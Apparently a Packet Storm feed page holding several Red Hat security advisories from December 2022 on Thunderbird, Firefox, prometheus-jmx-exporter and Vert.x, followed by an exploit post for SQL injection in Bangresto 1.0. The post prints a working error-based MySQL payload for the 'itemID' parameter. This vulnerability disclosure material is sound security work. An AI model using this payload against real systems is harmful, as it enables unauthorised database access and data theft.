R2O6yhERREcT1uz+gFh4PrnuIEHbI0aE7Z62qdDhS+70ZOnGlEXHQLEy821GX6oH  
YTO00avi0HNmP/VCxMjIYFSsYNnN0GRgjsuXSx9r5wSN3rFr3S25Z0jJlfI5y5cZ  
lmzRC0qgu7AYaXU/fT/I27E+rzJwvQ3A4x6ym5X//1FqPK9GF2PL3+1no6QsWRJQ  
GN0HX56v1WYzwJlr0wNPoYtA5cZtZHUWI7KD01nCE4FbWchN/leCnBTS8NhShcqc  
ibvrWhShWJnysdm/e71EstD77BDiEX/kUgMh3C2n6dI9BJ7pNtcTudyxrV84YhOq  
jdzV+7kUaU+hicdZqo+BPq/Jj/nfokOxT6nw3NkpIN1dyZp70k+R8wwDF7iIUUYt  
XXLOYWn9f8mLdoJ4zw0U/D90OtfMs35EcaoxVXK9TdPsYzj5owcscQkA1lQVg0TC  
KkmkzJRaEirsWQCkWsjlQRom5SpmLhOoGi9N7BJyPdgfVQ9kHoDKr6nDXwBgvqRO  
vNbK7tq6lahoWMy7qslAtntEKJYZZS780B+XHk1cmqTZj3KiBDtUJ43eu3OCzu18  
ipw04rJ83/HY7M3yg/+AagF8ZTPWdrAr4X8XOnb2Yro58x+yU0c/qqSo8jdmV6LF  
X/pyRBxqEVI=MfrL  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-9069-01

Red Hat Security Advisory 2022-9077-01 - Mozilla Thunderbird is a standalone mail and newsgroup client. This update upgrades Thunderbird to version 102.6.0. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: thunderbird security update  
Advisory ID:       RHSA-2022:9077-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:9077  
Issue date:        2022-12-15  
CVE Names:         CVE-2022-45414 CVE-2022-46872 CVE-2022-46874  
                   CVE-2022-46878 CVE-2022-46880 CVE-2022-46881  
                   CVE-2022-46882  
====================================================================  
1. Summary:

An update for thunderbird is now available for Red Hat Enterprise Linux 8.1  
Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream E4S (v. 8.1) - ppc64le, x86_64

3. Description:

Mozilla Thunderbird is a standalone mail and newsgroup client.

This update upgrades Thunderbird to version 102.6.0.

Security Fix(es):

* Mozilla: Arbitrary file read from a compromised content process  
(CVE-2022-46872)

* Mozilla: Memory safety bugs fixed in Firefox ESR 102.6 and Thunderbird  
102.6 (CVE-2022-46878)

* Mozilla: Use-after-free in WebGL (CVE-2022-46880)

* Mozilla: Memory corruption in WebGL (CVE-2022-46881)

* Mozilla: Quoting from an HTML email with certain tags will trigger  
network requests and load remote content, regardless of a configuration to  
block remote content (CVE-2022-45414)

* Mozilla: Drag and Dropped Filenames could have been truncated to  
malicious extensions (CVE-2022-46874)

* Mozilla: Use-after-free in WebGL (CVE-2022-46882)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

All running instances of Thunderbird must be restarted for the update to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2149868 - CVE-2022-45414 Mozilla: Quoting from an HTML email with certain tags will trigger network requests and load remote content, regardless of a configuration to block remote content  
2153441 - CVE-2022-46872 Mozilla: Arbitrary file read from a compromised content process  
2153449 - CVE-2022-46874 Mozilla: Drag and Dropped Filenames could have been truncated to malicious extensions  
2153454 - CVE-2022-46878 Mozilla: Memory safety bugs fixed in Firefox ESR 102.6 and Thunderbird 102.6  
2153463 - CVE-2022-46880 Mozilla: Use-after-free in WebGL  
2153466 - CVE-2022-46881 Mozilla: Memory corruption in WebGL  
2153467 - CVE-2022-46882 Mozilla: Use-after-free in WebGL

6. Package List:

Red Hat Enterprise Linux AppStream E4S (v. 8.1):

Source:  
thunderbird-102.6.0-2.el8_1.src.rpm

ppc64le:  
thunderbird-102.6.0-2.el8_1.ppc64le.rpm  
thunderbird-debuginfo-102.6.0-2.el8_1.ppc64le.rpm  
thunderbird-debugsource-102.6.0-2.el8_1.ppc64le.rpm

x86_64:  
thunderbird-102.6.0-2.el8_1.x86_64.rpm  
thunderbird-debuginfo-102.6.0-2.el8_1.x86_64.rpm  
thunderbird-debugsource-102.6.0-2.el8_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-45414  
https://access.redhat.com/security/cve/CVE-2022-46872  
https://access.redhat.com/security/cve/CVE-2022-46874  
https://access.redhat.com/security/cve/CVE-2022-46878  
https://access.redhat.com/security/cve/CVE-2022-46880  
https://access.redhat.com/security/cve/CVE-2022-46881  
https://access.redhat.com/security/cve/CVE-2022-46882  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5uhJNzjgjWX9erEAQiI6g//QAHaUzB5WdVmUnglLO6NAz1B7iHY9AFu  
lGJQij+kpcZWhhlJNO8ETcHckgpaFZ4Ybzew+lgKFClBFTg89g2ikwAoWykFVSU0  
qAJLnTsnsXbjXidkZUwsoQjFkWrZKw2AFtNI0oL6Yosf9UGaHHZj/JAlzX6YyEXk  
oXaWxK42fE5uYMSDmyfZOswfdfkKK+E20RNz1wmtg07Q23WGOZe6gY52zvQ+2wBA  
QLJWnMFZDzGG5OTTnHhKy/KKdoGE2ARKLZ91uNuWZFWO45CBhHurtDOUGQ4ig2kZ  
HblnRhiqWMC1A1j4faoKbjMc/Fkz40cDj/1xeSuRuKyFDfYPHjAoAH9p1OUcEkwX  
dmMS0ADGE8cTM7YlCRJ7mdtsLRa5AuJU2gjpGaT+NX1X12nT2AJEdk0mgvHVYuaA  
gZTuoHMfRU3lkmfx9Jl1lCmdlPlRAb2+t5KUGXvseOH8hdS/ykFpyymE1uFTMxSC  
GVEeDmxJ4Kh5MjrGmooMX5O8lo0Slo+RCRM1UJ2/f16GkD4FQ5WeIr8L1n9W6TZa  
Fe1ZKYgOC5fLW2l3e7KgyQkyWgCVrZG1kXR6qOMpOsL7cJMVGf0sxRfUD80kvw1f  
Q3RXhpyMulm7yj0dIKPhaTGoVsn9l4fTMfbewLgXEivDcQazx6GuajvRoZBpmcss  
qSWftN0eQtE=bnHu  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-9077-01

Red Hat Security Advisory 2022-9067-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.6.0 ESR. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2022:9067-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:9067  
Issue date:        2022-12-15  
CVE Names:         CVE-2022-46872 CVE-2022-46874 CVE-2022-46878  
                   CVE-2022-46880 CVE-2022-46881 CVE-2022-46882  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.6.0 ESR.

Security Fix(es):

* Mozilla: Arbitrary file read from a compromised content process  
(CVE-2022-46872)

* Mozilla: Memory safety bugs fixed in Firefox ESR 102.6 and Thunderbird  
102.6 (CVE-2022-46878)

* Mozilla: Use-after-free in WebGL (CVE-2022-46880)

* Mozilla: Memory corruption in WebGL (CVE-2022-46881)

* Mozilla: Drag and Dropped Filenames could have been truncated to  
malicious extensions (CVE-2022-46874)

* Mozilla: Use-after-free in WebGL (CVE-2022-46882)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2153441 - CVE-2022-46872 Mozilla: Arbitrary file read from a compromised content process  
2153449 - CVE-2022-46874 Mozilla: Drag and Dropped Filenames could have been truncated to malicious extensions  
2153454 - CVE-2022-46878 Mozilla: Memory safety bugs fixed in Firefox ESR 102.6 and Thunderbird 102.6  
2153463 - CVE-2022-46880 Mozilla: Use-after-free in WebGL  
2153466 - CVE-2022-46881 Mozilla: Memory corruption in WebGL  
2153467 - CVE-2022-46882 Mozilla: Use-after-free in WebGL

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
firefox-102.6.0-1.el8_7.src.rpm

aarch64:  
firefox-102.6.0-1.el8_7.aarch64.rpm  
firefox-debuginfo-102.6.0-1.el8_7.aarch64.rpm  
firefox-debugsource-102.6.0-1.el8_7.aarch64.rpm

ppc64le:  
firefox-102.6.0-1.el8_7.ppc64le.rpm  
firefox-debuginfo-102.6.0-1.el8_7.ppc64le.rpm  
firefox-debugsource-102.6.0-1.el8_7.ppc64le.rpm

s390x:  
firefox-102.6.0-1.el8_7.s390x.rpm  
firefox-debuginfo-102.6.0-1.el8_7.s390x.rpm  
firefox-debugsource-102.6.0-1.el8_7.s390x.rpm

x86_64:  
firefox-102.6.0-1.el8_7.x86_64.rpm  
firefox-debuginfo-102.6.0-1.el8_7.x86_64.rpm  
firefox-debugsource-102.6.0-1.el8_7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-46872  
https://access.redhat.com/security/cve/CVE-2022-46874  
https://access.redhat.com/security/cve/CVE-2022-46878  
https://access.redhat.com/security/cve/CVE-2022-46880  
https://access.redhat.com/security/cve/CVE-2022-46881  
https://access.redhat.com/security/cve/CVE-2022-46882  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5uhINzjgjWX9erEAQhsCBAAofrVoNgJJ6cPmdajVnfBs1/mUEAli9jI  
V683ma7DQazn20wBOzqLq4aTGNYxVfQFalgfL3jOSYg8qlPcugDh5jAJet/h3RWI  
1pJlC83Ud+QZDU+rbH9oMx7RW1rDbgeuvtR03EMrrL4s9sxgWmTy4+9eFJYofDnL  
culbyd2PzOc9whMbH5Z4y2W4AszBNU9yrUQzIRu1VSXq7uhdA7dyyahtxsCjiTQl  
s0VQADsJuxxCgYk0Xcb8B376kMgg8qZWgDsg/Iv4TXgv0Y9e853HIvswNivXXLCd  
BxU34vEDSTLIoSee3vCCeNKg0SSp1R3zL9bnLK1Hy03WSDnOvO0r2QSksOCs+5WD  
CZ1Y32auq05U3yY+1pg01JNLbOTwxtfejqxQNI/liaQy8p3Sp+tdNpLO40sirawT  
/kwOMhZjEgZwMiy80qkhMFZvBmsvosN7rJQxlLRkUS1wLwhYerX3F8EvgrqNOpAy  
mInilC8KX3iJZm79GtrG9fciUUCJWCGwQg0D3+JZgzHrTz7WUiwSxVnRr5lLGE8X  
h4QotqyCLdanR/Tt7RNQpro9FGTNodlHp20kk2uCHB0GcQ3zL1Z1DZ8TfEYf2rRm  
mQ8Ldp7OlaL53+IiU0unytZSAV9ypVfyy1CDN09CL68+jSftO/PRvWN9b7X0ld5W  
LHBMnzo9r0kJF  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-9067-01

Red Hat Security Advisory 2022-9058-01 - Prometheus JMX Exporter is a JMX to Prometheus exporter: a collector that can be configured to scrape and expose MBeans of a JMX target. Issues addressed include code execution and deserialization vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: prometheus-jmx-exporter security update  
Advisory ID:       RHSA-2022:9058-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:9058  
Issue date:        2022-12-15  
CVE Names:         CVE-2022-1471  
====================================================================  
1. Summary:

An update for prometheus-jmx-exporter is now available for Red Hat  
Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - noarch

3. Description:

Prometheus JMX Exporter is a JMX to Prometheus exporter: a collector that  
can be configured to scrape and expose MBeans of a JMX target.

Security Fix(es):

* SnakeYaml: Constructor Deserialization Remote Code Execution  
(CVE-2022-1471)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2150009 - CVE-2022-1471 SnakeYaml: Constructor Deserialization Remote Code Execution

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
prometheus-jmx-exporter-0.12.0-9.el8_7.src.rpm

noarch:  
prometheus-jmx-exporter-0.12.0-9.el8_7.noarch.rpm  
prometheus-jmx-exporter-openjdk11-0.12.0-9.el8_7.noarch.rpm  
prometheus-jmx-exporter-openjdk17-0.12.0-9.el8_7.noarch.rpm  
prometheus-jmx-exporter-openjdk8-0.12.0-9.el8_7.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1471  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/cve/CVE-2022-1471

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5tMj9zjgjWX9erEAQjTGw//bKVd2x49d3FgJD/JDguo1l2702uy6jR5  
+cgE1y3cjQ+v6SKfEjapda+EKQWt5xR0rrZDiBG+1PobLGx/ntx96dF7EUARv0Ld  
KJTn/snPG5qgkIGzQzzVtsBZp5kjCVlJeLqvnMGQrXppP8NiK8287cyJIjC0bZAl  
AD1sqvCefS3U5uR+hELYjQfjw7+8EWKaaqFuDCvnQfc3Z/iM2SzAGSwf/xh80i9a  
4nGiDmwsO0rsLILA3flVBpVSfFvrDYTXpP5fXGrkf5heRJkH/ztvi4MuiOdHsfE+  
BY//smJzdP23T7h6qacmtw8/vyqRcdOV4UfpftwhXrkka3gUG3JOwbPd3WRL1NuB  
tVtA1rYOYJZ1lghJ4sRuzcWzQ5L5IUakNBRZBdh2V1HElXU9ZbWGTz2f36FFEmzc  
tUCx/uPEvhAX/b6qOU1avoI/fUxQVAA4TVrTMKvyhBcvDMs8MBs9D7KxC3lcCCiv  
WIWyMRu6XhNXv6kscFqWuTqqmQ5gvHgBeS+FifjE91Ysokf7ff8ye4iXdptjAy2C  
tQ/STSjSZLru2zP64+6xIg8nZDIqVf1JouQvTVeomQyubmwjbOXq2msUEZWNxPnf  
tehQ5LRMX1YkDJaiUrDNvCMf5Jma3BeqtCt80RRiqAXLuP67e/3MBAgM5lqZjVe5  
k3tBGWDyq8U=T1+4  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-9058-01

Red Hat Security Advisory 2022-9032-01 - This release of Red Hat build of Eclipse Vert.x 4.3.4 GA includes security updates. For more information, see the release notes listed in the References section. Issues addressed include code execution and deserialization vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: Red Hat build of Eclipse Vert.x 4.3.4 security update  
Advisory ID:       RHSA-2022:9032-01  
Product:           Red Hat OpenShift Application Runtimes  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:9032  
Issue date:        2022-12-15  
CVE Names:         CVE-2022-1471 CVE-2022-42003 CVE-2022-42004  
====================================================================  
1. Summary:

An update is now available for Red Hat build of Eclipse Vert.x.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each  
vulnerability. For more information, see the CVE pages listed in the  
References section.

2. Description:

This release of Red Hat build of Eclipse Vert.x 4.3.4 GA includes security  
updates. For more information, see the release notes listed in the  
References section.

Security Fix(es):

* snakeyaml: Constructor Deserialization Remote Code Execution  
(CVE-2022-1471)

* jackson-databind: deep wrapper array nesting wrt  
UNWRAP_SINGLE_VALUE_ARRAYS (CVE-2022-42003)

* jackson-databind: use of deeply nested arrays (CVE-2022-42004)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgements, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

Before applying the update, back up your existing installation, including  
all applications, configuration files, databases and database settings, and  
so on.

The References section of this erratum contains a download link for the  
update. You must be logged in to download the update.

4. Bugs fixed (https://bugzilla.redhat.com/):

2135244 - CVE-2022-42003 jackson-databind: deep wrapper array nesting wrt UNWRAP_SINGLE_VALUE_ARRAYS  
2135247 - CVE-2022-42004 jackson-databind: use of deeply nested arrays  
2150009 - CVE-2022-1471 SnakeYaml: Constructor Deserialization Remote Code Execution

5. References:

https://access.redhat.com/security/cve/CVE-2022-1471  
https://access.redhat.com/security/cve/CVE-2022-42003  
https://access.redhat.com/security/cve/CVE-2022-42004  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&productÊtRhoar.eclipse.vertx&version=4.3.4  
https://access.redhat.com/documentation/en-us/red_hat_build_of_eclipse_vert.x/4.3/html/release_notes_for_eclipse_vert.x_4.3/index

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5tMjNzjgjWX9erEAQg27BAAhyVZNJ5iJ/jfYLI1MZBtZ73nJvm5hHew  
LpXPkPRGz/37ahr8rNwIqeWx/IbleB7easbUfYgRYG7RA79BZhTDU40S/c81X7Fc  
OtVGA8hB9W0rRDt0VIV8HKwYxz+nPK3w2HWXMaQPsZA0PriqntxeL8sXOe3I51af  
aAvFS74bWX50QyBY2bMb5L5apVPUOd7WBaEd0nfkA6XQcEcEFZJpkAJdq4isfYeV  
FVEr1aM4yzFWpxo7P2sOlhsL1Fcl+kQx8iLNkf3CKU7iCbvxb4mrW7nvhm2o2lTG  
JxqswFhXRDJLOvEIE0SskoSf7KEoKuoykN24zCzMO9sbirQm4cloRsZh6IFgbD8J  
bB3imFaTIB4swVVIVzJ8ANCCSEshR+oOqgMe2uyi6rjQbLtc2GurW3KmOCQ2IfKz  
DFaDsw0A/AcQJ4eUAk47eX3wlYbDN+G2s4zut8VgbFdlJetj9btfnG15zKJtOTXC  
b9eXsIJTbGaItUBtm4GitO6YgY41RJuntKmtcLBJ3yYDJc8pAykmLEqRlm0Y0/S7  
l/gmbx9FMoLtkFZTqxg6v3FmBxQhGxKy225yW8TZDC9Kz4guMuZF9woMEM44QRn9  
rRResiBH2MpHD8bcmysZVoo3e0e4QpZbdhXOsPD4lf45djJpTYjrp9kE53YDkyLx  
0RfunWsdRPQ=5ZIs  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-9032-01

Bangresta version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: Bangresto 1.0 SQLi## Author: nu11secur1ty## Date: 12.16.2022## Vendor: https://axcora.com/, https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html## Demo: https://axcora.my.id/bangrestoapp/start.php## Software: https://github.com/mesinkasir/bangresto## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Bangresto## Description:The `itemID` parameter appears to be vulnerable to SQL injection attacks.The payload ' was submitted in the itemID parameter, and a databaseerror message was returned.The attacker can be stooling all information from the database of thisapplication.## STATUS: CRITICAL Vulnerability[+] Payload:```MySQL---Parameter: itemID (GET)    Type: error-based    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)    Payload: itemID=(UPDATEXML(2539,CONCAT(0x2e,0x7171767871,(SELECT(ELT(2539=2539,1))),0x7170706a71),2327))&menuID=1---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Bangresto)## Proof and Exploit:[href](https://streamable.com/moapnd)## Time spent`00:30:00`

Source

Packet Storm